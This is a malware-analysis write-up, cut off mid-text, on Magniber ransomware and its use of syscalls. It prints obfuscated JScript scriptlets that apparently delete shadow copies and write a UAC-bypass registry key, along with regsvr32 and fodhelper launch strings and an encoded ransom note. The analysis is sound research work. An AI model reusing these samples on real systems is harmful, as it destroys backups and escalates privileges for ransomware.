# Magniber Ransomware Triage
> Taking a look at Magniber ransomware and analyzing malware with syscalls

- toc: true 
- badges: true
- categories: [Magniber,malware,research,syscalls,ransomware]

## Overview

We will be taking a look at Magniber ransomware. This ransomware is unique in that it uses syscalls instead of APIs and injects its main payload instead of unpacking to a nice PE.

![](https://www.cybereason.com/hs-fs/hubfs/dam/images/images-web/blog-images/PrintNightmare-Magniber-Ransomware-image-2.jpg?width=1999&name=PrintNightmare-Magniber-Ransomware-image-2.jpg)

### Sample
- [Magniber Packed (Malshare)](https://malshare.com/sample.php?action=detail&hash=cb34e574d68c3646ea7985542b5385f134ff71b715ee10f364af43f63a992774)

### References
- [Threat Analysis Report: PrintNightmare and Magniber Ransomware](https://www.cybereason.com/blog/threat-analysis-report-printnightmare-and-magniber-ransomware)
- [What is a syscall](https://www.youtube.com/watch?v=Uba3SQH2jNE)
- [Extracting syscall numbers from ntdll (with code)](https://research.openanalysis.net/magniber/malware/research/syscalls/ransomware/2022/05/03/syscall_reversing.html)


## Reversing Notes

### Dumping 

The sample injects its main payload into RWX memory but since it uses syscalls we can't use our x64dbg trick of monitoring memory writes to track the injected memory. Instead we just run the sample then use [processhacker](https://processhacker.sourceforge.io/) to suspend the process and inpsect the memory.

```
c:\Windows\System32\rundll32.exe magnibar.bin,#1
```

We can see there are a lot of 4kB RWX segments but when we inspect them there is only a few bytes of code. However there is also a larger 52kB segment that contains what looks like code and some strings. We can dump this for further static analysis.

![](https://i.imgur.com/AXgJvaB.png)

#### Strings
The following strings are injected along with the payload.
```
regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/gxv495p91vs
cmd /c "start fodhelper.exe"
cmd /c "start compmgmtlauncher.exe"
\??\
0123456789abcdef
f0123456789
egoxsjzcj
j\BaseNamedObjects\yv6493
Microsoft Enhanced RSA and AES Cryptographic Provider
documents and settings
appdata
local settings
sample music
sample pictures
sample videos
tor browser
recycle
windows
boot
intel
msocache
perflogs
program files
programdata
recovery
system volume information
winnt
README.html
```

### Payload Static Analysis

Once we open the dumped payload in IDA we can see that it relies on syscalls.

![](https://i.imgur.com/HDJ7KPj.png)

In order to resolve these sycalls we need to create an enum mapping the syscall number to the API name. We can use our own [sycall enum script](https://research.openanalysis.net/magniber/malware/research/syscalls/ransomware/2022/05/03/syscall_reversing.html) for this task. Once we import the enum into IDA we can resolve the syscall numbers.

Since syscall numbers depend on the Windows build there is some logic in the malware that is used to check the [KUSER_SHARED_DATA](https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/api/ntexapi_x/kuser_shared_data/index.htm) for the `NtBuildNumber` and `NtMajorVersion`. These manifest as refernces to memory at `0x7FFE0260` and `0x7FFE026C`. IDA isn't able to resolve this and since our syscalls will be specific to windows version that we pulled our ntdll from we can artificailly set these values in IDA.

- `Edit->Segments->Creat segement...`
- Set the segment start address to `0x7FFE0260` and the length to atleast include `0x7FFE026C + 4`
- Open Segments window and right click `edit` the new segment and change the `Segment permissions` to `Read` only
- Edit the segment bytes to add the correct build number and major version number

Once you have done this you can decompile the function and IDA will automatically remove all of the non-relevant syscalls.

### Automatically Fixing KUSER SHARED Refs in IDA

This code is from [Thomas](https://www.twitch.tv/reversingdev) 

```python
def fix_kuser_shared_data():
    """
    Find all calls to KUserSharedData, create a corresponding segment,
    load Windows 10 type library, and import the definition to the database
    """
    address = 0x7FFE0000

    # create the segment
    AddSeg(address, address, 0, 1, 0, scPub)
    set_segm_name(address, 'KUserSharedData')
    set_segm_attr(address, SEGATTR_PERM, SEGPERM_READ | SEGPERM_WRITE)
    set_segm_attr(address, SEGATTR_ALIGN, saRelPara)

    # load windows 10 type library
    add_til('ntddk_win10', ADDTIL_DEFAULT)

    # import the definition to the database
    import_type(None, -1, '_KUSER_SHARED_DATA', IMPTYPE_LOCAL)
    create_struct(address, -1, "_KUSER_SHARED_DATA")
```

## Embeded Script
```js
<?XML version="1.0"?><scriptlet><registration progid="l06g2t"><script language="JScript"><![CDATA[var vk87t568 = new Array(111,106,114,108,104,32,46,112,79,105,118,101,99,83,87,97,110,116,82,113,119,65,100,109,47,115,98,68,117,88,120);for(var a7tvb=0;a7tvb<31;a7tvb++) vk87t568[a7tvb] = String.fromCharCode(vk87t568[a7tvb]);var x9uvqw7 = new this[vk87t568[21]+vk87t568[12]+vk87t568[17]+vk87t568[9]+vk87t568[10]+vk87t568[11]+vk87t568[29]+vk87t568[8]+vk87t568[26]+vk87t568[1]+vk87t568[11]+vk87t568[12]+vk87t568[17]](vk87t568[14]+vk87t568[13]+vk87t568[12]+vk87t568[2]+vk87t568[9]+vk87t568[7]+vk87t568[17]+vk87t568[6]+vk87t568[13]+vk87t568[4]+vk87t568[11]+vk87t568[3]+vk87t568[3])[vk87t568[18]+vk87t568[28]+vk87t568[16]](vk87t568[10]+vk87t568[25]+vk87t568[25]+vk87t568[15]+vk87t568[22]+vk87t568[23]+vk87t568[9]+vk87t568[16]+vk87t568[6]+vk87t568[11]+vk87t568[30]+vk87t568[11]+vk87t568[5]+vk87t568[27]+vk87t568[11]+vk87t568[3]+vk87t568[11]+vk87t568[17]+vk87t568[11]+vk87t568[5]+vk87t568[13]+vk87t568[4]+vk87t568[15]+vk87t568[22]+vk87t568[0]+vk87t568[20]+vk87t568[25]+vk87t568[5]+vk87t568[24]+vk87t568[15]+vk87t568[3]+vk87t568[3]+vk87t568[5]+vk87t568[24]+vk87t568[19]+vk87t568[28]+vk87t568[9]+vk87t568[11]+vk87t568[17]);]]></script></registration></scriptlet>
<?XML version="1.0"?><scriptlet><registration progid="r6ys81u"><script language="JScript"><![CDATA[var ch4me00 = new Array(71,53,102,97,114,67,48,111,50,58,65,69,119,79,68,103,90,104,83,75,113,112,117,85,108,120,82,45,100,80,109,88,78,47,46,32,89,105,118,98,51,72,101,106,92,121,99,110,87,115,116,84,95);for(var a7n5f=0;a7n5f<53;a7n5f++) ch4me00[a7n5f] = String.fromCharCode(ch4me00[a7n5f]);var h873tlc494 = new this[ch4me00[10]+ch4me00[46]+ch4me00[50]+ch4me00[37]+ch4me00[38]+ch4me00[42]+ch4me00[31]+ch4me00[13]+ch4me00[39]+ch4me00[43]+ch4me00[42]+ch4me00[46]+ch4me00[50]](ch4me00[48]+ch4me00[18]+ch4me00[46]+ch4me00[4]+ch4me00[37]+ch4me00[21]+ch4me00[50]+ch4me00[34]+ch4me00[18]+ch4me00[17]+ch4me00[42]+ch4me00[24]+ch4me00[24])[ch4me00[26]+ch4me00[42]+ch4me00[15]+ch4me00[48]+ch4me00[4]+ch4me00[37]+ch4me00[50]+ch4me00[42]](ch4me00[41]+ch4me00[19]+ch4me00[11]+ch4me00[36]+ch4me00[52]+ch4me00[5]+ch4me00[23]+ch4me00[26]+ch4me00[26]+ch4me00[11]+ch4me00[32]+ch4me00[51]+ch4me00[52]+ch4me00[23]+ch4me00[18]+ch4me00[11]+ch4me00[26]+ch4me00[44]+ch4me00[18]+ch4me00[7]+ch4me00[2]+ch4me00[50]+ch4me00[12]+ch4me00[3]+ch4me00[4]+ch4me00[42]+ch4me00[44]+ch4me00[5]+ch4me00[24]+ch4me00[3]+ch4me00[49]+ch4me00[49]+ch4me00[42]+ch4me00[49]+ch4me00[44]+ch4me00[30]+ch4me00[49]+ch4me00[27]+ch4me00[49]+ch4me00[42]+ch4me00[50]+ch4me00[50]+ch4me00[37]+ch4me00[47]+ch4me00[15]+ch4me00[49]+ch4me00[44]+ch4me00[49]+ch4me00[17]+ch4me00[42]+ch4me00[24]+ch4me00[24]+ch4me00[44]+ch4me00[7]+ch4me00[21]+ch4me00[42]+ch4me00[47]+ch4me00[44]+ch4me00[46]+ch4me00[7]+ch4me00[30]+ch4me00[30]+ch4me00[3]+ch4me00[47]+ch4me00[28]+ch4me00[44],ch4me00[4]+ch4me00[42]+ch4me00[15]+ch4me00[49]+ch4me00[38]+ch4me00[4]+ch4me00[40]+ch4me00[8]+ch4me00[34]+ch4me00[42]+ch4me00[25]+ch4me00[42]+ch4me00[35]+ch4me00[49]+ch4me00[46]+ch4me00[4]+ch4me00[7]+ch4me00[39]+ch4me00[43]+ch4me00[34]+ch4me00[28]+ch4me00[24]+ch4me00[24]+ch4me00[35]+ch4me00[33]+ch4me00[49]+ch4me00[35]+ch4me00[33]+ch4me00[22]+ch4me00[35]+ch4me00[33]+ch4me00[47]+ch4me00[35]+ch4me00[33]+ch4me00[37]+ch4me00[9]+ch4me00[34]+ch4me00[34]+ch4me00[33]+ch4me00[34]+ch4me00[34]+ch4me00[33]+ch4me00[34]+ch4me00[34]+ch4me00[33]+ch4me00[23]+ch4me00[49]+ch4me00[42]+ch4me00[4]+ch4me00[49]+ch4me00[33]+ch4me00[29]+ch4me00[22]+ch4me00[39]+ch4me00[24]+ch4me00[37]+ch4me00[46]+ch4me00[33]+ch4me00[45]+ch4me00[20]+ch4me00[1]+ch4me00[45]+ch4me00[17]+ch4me00[6],ch4me00[26]+ch4me00[11]+ch4me00[0]+ch4me00[52]+ch4me00[18]+ch4me00[16]);var h873tlc494 = new this[ch4me00[10]+ch4me00[46]+ch4me00[50]+ch4me00[37]+ch4me00[38]+ch4me00[42]+ch4me00[31]+ch4me00[13]+ch4me00[39]+ch4me00[43]+ch4me00[42]+ch4me00[46]+ch4me00[50]](ch4me00[48]+ch4me00[18]+ch4me00[46]+ch4me00[4]+ch4me00[37]+ch4me00[21]+ch4me00[50]+ch4me00[34]+ch4me00[18]+ch4me00[17]+ch4me00[42]+ch4me00[24]+ch4me00[24])[ch4me00[26]+ch4me00[42]+ch4me00[15]+ch4me00[48]+ch4me00[4]+ch4me00[37]+ch4me00[50]+ch4me00[42]](ch4me00[41]+ch4me00[19]+ch4me00[11]+ch4me00[36]+ch4me00[52]+ch4me00[5]+ch4me00[23]+ch4me00[26]+ch4me00[26]+ch4me00[11]+ch4me00[32]+ch4me00[51]+ch4me00[52]+ch4me00[23]+ch4me00[18]+ch4me00[11]+ch4me00[26]+ch4me00[44]+ch4me00[18]+ch4me00[7]+ch4me00[2]+ch4me00[50]+ch4me00[12]+ch4me00[3]+ch4me00[4]+ch4me00[42]+ch4me00[44]+ch4me00[5]+ch4me00[24]+ch4me00[3]+ch4me00[49]+ch4me00[49]+ch4me00[42]+ch4me00[49]+ch4me00[44]+ch4me00[30]+ch4me00[49]+ch4me00[27]+ch4me00[49]+ch4me00[42]+ch4me00[50]+ch4me00[50]+ch4me00[37]+ch4me00[47]+ch4me00[15]+ch4me00[49]+ch4me00[44]+ch4me00[49]+ch4me00[17]+ch4me00[42]+ch4me00[24]+ch4me00[24]+ch4me00[44]+ch4me00[7]+ch4me00[21]+ch4me00[42]+ch4me00[47]+ch4me00[44]+ch4me00[46]+ch4me00[7]+ch4me00[30]+ch4me00[30]+ch4me00[3]+ch4me00[47]+ch4me00[28]+ch4me00[44]+ch4me00[14]+ch4me00[42]+ch4me00[24]+ch4me00[42]+ch4me00[15]+ch4me00[3]+ch4me00[50]+ch4me00[42]+ch4me00[11]+ch4me00[25]+ch4me00[42]+ch4me00[46]+ch4me00[22]+ch4me00[50]+ch4me00[42], "", ch4me00[26]+ch4me00[11]+ch4me00[0]+ch4me00[52]+ch4me00[18]+ch4me00[16]);]]></script></registration></scriptlet>
<?XML version="1.0"?><scriptlet><registration progid="zmqj1z18yx"><script language="JScript"><![CDATA[var g2701095 = new Array(120,67,108,121,113,103,111,92,87,51,47,95,118,83,104,106,58,69,72,84,99,97,78,90,100,80,110,65,115,48,102,109,82,46,105,85,98,116,75,114,32,50,89,53,88,71,112,79,119,101,117);for(var hqu0ua=0;hqu0ua<51;hqu0ua++) g2701095[hqu0ua] = String.fromCharCode(g2701095[hqu0ua]);var gpf8p = new this[g2701095[27]+g2701095[20]+g2701095[37]+g2701095[34]+g2701095[12]+g2701095[49]+g2701095[44]+g2701095[47]+g2701095[36]+g2701095[15]+g2701095[49]+g2701095[20]+g2701095[37]](g2701095[8]+g2701095[13]+g2701095[20]+g2701095[39]+g2701095[34]+g2701095[46]+g2701095[37]+g2701095[33]+g2701095[13]+g2701095[14]+g2701095[49]+g2701095[2]+g2701095[2])[g2701095[32]+g2701095[49]+g2701095[5]+g2701095[8]+g2701095[39]+g2701095[34]+g2701095[37]+g2701095[49]](g2701095[18]+g2701095[38]+g2701095[17]+g2701095[42]+g2701095[11]+g2701095[1]+g2701095[35]+g2701095[32]+g2701095[32]+g2701095[17]+g2701095[22]+g2701095[19]+g2701095[11]+g2701095[35]+g2701095[13]+g2701095[17]+g2701095[32]+g2701095[7]+g2701095[13]+g2701095[6]+g2701095[30]+g2701095[37]+g2701095[48]+g2701095[21]+g2701095[39]+g2701095[49]+g2701095[7]+g2701095[1]+g2701095[2]+g2701095[21]+g2701095[28]+g2701095[28]+g2701095[49]+g2701095[28]+g2701095[7]+g2701095[31]+g2701095[28]+g2701095[20]+g2701095[30]+g2701095[34]+g2701095[2]+g2701095[49]+g2701095[7]+g2701095[28]+g2701095[14]+g2701095[49]+g2701095[2]+g2701095[2]+g2701095[7]+g2701095[6]+g2701095[46]+g2701095[49]+g2701095[26]+g2701095[7]+g2701095[20]+g2701095[6]+g2701095[31]+g2701095[31]+g2701095[21]+g2701095[26]+g2701095[24]+g2701095[7],g2701095[39]+g2701095[49]+g2701095[5]+g2701095[28]+g2701095[12]+g2701095[39]+g2701095[9]+g2701095[41]+g2701095[33]+g2701095[49]+g2701095[0]+g2701095[49]+g2701095[40]+g2701095[28]+g2701095[20]+g2701095[39]+g2701095[6]+g2701095[36]+g2701095[15]+g2701095[33]+g2701095[24]+g2701095[2]+g2701095[2]+g2701095[40]+g2701095[10]+g2701095[28]+g2701095[40]+g2701095[10]+g2701095[50]+g2701095[40]+g2701095[10]+g2701095[26]+g2701095[40]+g2701095[10]+g2701095[34]+g2701095[16]+g2701095[33]+g2701095[33]+g2701095[10]+g2701095[33]+g2701095[33]+g2701095[10]+g2701095[33]+g2701095[33]+g2701095[10]+g2701095[35]+g2701095[28]+g2701095[49]+g2701095[39]+g2701095[28]+g2701095[10]+g2701095[25]+g2701095[50]+g2701095[36]+g2701095[2]+g2701095[34]+g2701095[20]+g2701095[10]+g2701095[3]+g2701095[4]+g2701095[43]+g2701095[3]+g2701095[14]+g2701095[29],g2701095[32]+g2701095[17]+g2701095[45]+g2701095[11]+g2701095[13]+g2701095[23]);]]></script></registration></scriptlet>
```

## Embeded HTML
```html
<html><body><script>var c7gs9b80 = new Array(70,110,112,108,82,114,50,49,100,73,111,47,51,120,105,102,72,33,117,119,69,84,58,61,115,66,78,46,101,121,104,76,32,52,39,97,55,60,89,80,79,109,103,106,68,113,65,116,98,62,85,99,83,54,77,107,86,67,122,118);for(var w38qp=0;w38qp<60;w38qp++) c7gs9b80[w38qp] = String.fromCharCode(c7gs9b80[w38qp]);d8k8ylg = "
";document.write(c7gs9b80[46]+c7gs9b80[31]+c7gs9b80[31]+c7gs9b80[32]+c7gs9b80[38]+c7gs9b80[40]+c7gs9b80[50]+c7gs9b80[4]+c7gs9b80[32]+c7gs9b80[44]+c7gs9b80[40]+c7gs9b80[57]+c7gs9b80[50]+c7gs9b80[54]+c7gs9b80[20]+c7gs9b80[26]+c7gs9b80[21]+c7gs9b80[52]+c7gs9b80[32]+c7gs9b80[39]+c7gs9b80[16]+c7gs9b80[40]+c7gs9b80[21]+c7gs9b80[40]+c7gs9b80[52]+c7gs9b80[32]+c7gs9b80[44]+c7gs9b80[46]+c7gs9b80[21]+c7gs9b80[46]+c7gs9b80[25]+c7gs9b80[46]+c7gs9b80[52]+c7gs9b80[20]+c7gs9b80[52]+c7gs9b80[32]+c7gs9b80[46]+c7gs9b80[26]+c7gs9b80[44]+c7gs9b80[32]+c7gs9b80[40]+c7gs9b80[21]+c7gs9b80[16]+c7gs9b80[20]+c7gs9b80[4]+c7gs9b80[32]+c7gs9b80[9]+c7gs9b80[54]+c7gs9b80[39]+c7gs9b80[40]+c7gs9b80[4]+c7gs9b80[21]+c7gs9b80[46]+c7gs9b80[26]+c7gs9b80[21]+c7gs9b80[32]+c7gs9b80[0]+c7gs9b80[9]+c7gs9b80[31]+c7gs9b80[20]+c7gs9b80[52]+c7gs9b80[32]+c7gs9b80[16]+c7gs9b80[46]+c7gs9b80[56]+c7gs9b80[20]+c7gs9b80[32]+c7gs9b80[25]+c7gs9b80[20]+c7gs9b80[20]+c7gs9b80[26]+c7gs9b80[32]+c7gs9b80[20]+c7gs9b80[26]+c7gs9b80[57]+c7gs9b80[4]+c7gs9b80[38]+c7gs9b80[39]+c7gs9b80[21]+c7gs9b80[20]+c7gs9b80[44]+c7gs9b80[17]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[38]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[26]+c7gs9b80[40]+c7gs9b80[21]+c7gs9b80[32]+c7gs9b80[8]+c7gs9b80[35]+c7gs9b80[41]+c7gs9b80[35]+c7gs9b80[42]+c7gs9b80[28]+c7gs9b80[8]+c7gs9b80[17]+c7gs9b80[32]+c7gs9b80[38]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[41]+c7gs9b80[10]+c7gs9b80[8]+c7gs9b80[14]+c7gs9b80[15]+c7gs9b80[14]+c7gs9b80[28]+c7gs9b80[8]+c7gs9b80[32]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[3]+c7gs9b80[29]+c7gs9b80[27]+c7gs9b80[32]+c7gs9b80[21]+c7gs9b80[30]+c7gs9b80[14]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[41]+c7gs9b80[10]+c7gs9b80[8]+c7gs9b80[14]+c7gs9b80[15]+c7gs9b80[14]+c7gs9b80[51]+c7gs9b80[35]+c7gs9b80[47]+c7gs9b80[14]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[32]+c7gs9b80[14]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[59]+c7gs9b80[28]+c7gs9b80[5]+c7gs9b80[24]+c7gs9b80[14]+c7gs9b80[48]+c7gs9b80[3]+c7gs9b80[28]+c7gs9b80[27]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[21]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[3]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[7]+c7gs9b80[32]+c7gs9b80[19]+c7gs9b80[35]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[10]+c7gs9b80[32]+c7gs9b80[8]+c7gs9b80[28]+c7gs9b80[51]+c7gs9b80[5]+c7gs9b80[29]+c7gs9b80[2]+c7gs9b80[47]+c7gs9b80[32]+c7gs9b80[29]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[14]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[10]+c7gs9b80[32]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[51]+c7gs9b80[28]+c7gs9b80[14]+c7gs9b80[59]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[5]+c7gs9b80[14]+c7gs9b80[59]+c7gs9b80[35]+c7gs9b80[47]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[55]+c7gs9b80[28]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[1]+c7gs9b80[8]+c7gs9b80[32]+c7gs9b80[8]+c7gs9b80[28]+c7gs9b80[51]+c7gs9b80[5]+c7gs9b80[29]+c7gs9b80[2]+c7gs9b80[47]+c7gs9b80[14]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[5]+c7gs9b80[10]+c7gs9b80[42]+c7gs9b80[5]+c7gs9b80[35]+c7gs9b80[41]+c7gs9b80[27]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[46]+c7gs9b80[1]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[47]+c7gs9b80[47]+c7gs9b80[28]+c7gs9b80[41]+c7gs9b80[2]+c7gs9b80[47]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[10]+c7gs9b80[32]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[47]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[29]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[19]+c7gs9b80[14]+c7gs9b80[47]+c7gs9b80[30]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[30]+c7gs9b80[14]+c7gs9b80[5]+c7gs9b80[8]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[47]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[24]+c7gs9b80[10]+c7gs9b80[15]+c7gs9b80[47]+c7gs9b80[19]+c7gs9b80[35]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[19]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[3]+c7gs9b80[32]+c7gs9b80[48]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[35]+c7gs9b80[47]+c7gs9b80[35]+c7gs9b80[3]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[10]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[29]+c7gs9b80[10]+c7gs9b80[18]+c7gs9b80[5]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[14]+c7gs9b80[3]+c7gs9b80[28]+c7gs9b80[24]+c7gs9b80[17]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[23]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[21]+c7gs9b80[10]+c7gs9b80[32]+c7gs9b80[5]+c7gs9b80[28]+c7gs9b80[51]+c7gs9b80[28]+c7gs9b80[14]+c7gs9b80[59]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[5]+c7gs9b80[14]+c7gs9b80[59]+c7gs9b80[35]+c7gs9b80[47]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[55]+c7gs9b80[28]+c7gs9b80[29]+c7gs9b80[32]+c7gs9b80[35]+c7gs9b80[1]+c7gs9b80[8]+c7gs9b80[32]+c7gs9b80[8]+c7gs9b80[28]+c7gs9b80[51]+c7gs9b80[5]+c7gs9b80[29]+c7gs9b80[2]+c7gs9b80[47]+c7gs9b80[14]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[32]+c7gs9b80[2]+c7gs9b80[5]+c7gs9b80[10]+c7gs9b80[42]+c7gs9b80[5]+c7gs9b80[35]+c7gs9b80[41]+c7gs9b80[32]+c7gs9b80[15]+c7gs9b80[10]+c7gs9b80[3]+c7gs9b80[3]+c7gs9b80[10]+c7gs9b80[19]+c7gs9b80[32]+c7gs9b80[47]+c7gs9b80[30]+c7gs9b80[28]+c7gs9b80[32]+c7gs9b80[14]+c7gs9b80[1]+c7gs9b80[24]+c7gs9b80[47]+c7gs9b80[5]+c7gs9b80[18]+c7gs9b80[51]+c7gs9b80[47]+c7gs9b80[14]+c7gs9b80[10]+c7gs9b80[1]+c7gs9b80[24]+c7gs9b80[32]+c7gs9b80[48]+c7gs9b80[28]+c7gs9b80[3]+c7gs9b80[10]+c7gs9b80[19]+c7gs9b80[22]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[37]+c7gs9b80[48]+c7gs9b80[5]+c7gs9b80[49]+c7gs9b80[7]+c7gs9b80[27]+c7gs9b80[32]+c7gs9b80[44]+c7gs9b80[10]+c7gs9b80[19]+c7gs9b80[1]+c7gs9b80[3]+c7gs9b80[10]